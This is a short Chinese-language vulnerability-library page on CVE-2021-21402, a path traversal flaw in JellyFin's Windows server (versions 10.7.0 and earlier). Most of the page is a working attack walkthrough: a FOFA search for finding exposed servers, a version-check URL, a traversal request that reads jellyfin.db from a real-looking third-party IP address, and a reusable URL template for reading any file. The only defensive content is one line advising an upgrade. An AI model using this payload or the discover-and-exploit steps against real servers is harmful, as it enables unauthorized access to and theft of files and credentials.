CVE-2021-21402 JellyFin 任意文件-漏洞文库小世界-安全文库-NGC660 安全实验室

CVE-2021-21402 JellyFin 任意文件

###CVE-2021-21402 JellyFin 任意文件读取-xxlm

 

漏洞简介

JellyFin的Windows端服务器不会对特定路径进行鉴权,可以导致攻击者利用Windows上的路径穿越来读取Windows服务器上的任意文件。本漏洞于2021年3月28日在最近版本的10.7.1中被修复。

影响版本

JellyFin <= 10.7.0

漏洞复现

fofa搜索JellyFin

1618392337254-e96b49fc-f99a-4de1-8ee4-a93a3452feef

判断版本

http://121.31.69.23:8096/System/Info/Public

1618392337210-a8042828-0f38-4486-8b32-6d0cf65b3758

以下是漏洞复现结果。
http://121.31.69.23:8096/Audio/anything/hls/..\data\jellyfin.db/stream.mp3/

1618392337335-c3653464-80a9-45bd-b18a-37b957726c10

可以通过访问

http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/

读取任意文件。

加固建议

尽快升级到最新版本

请登录后发表评论

    请登录后查看回复内容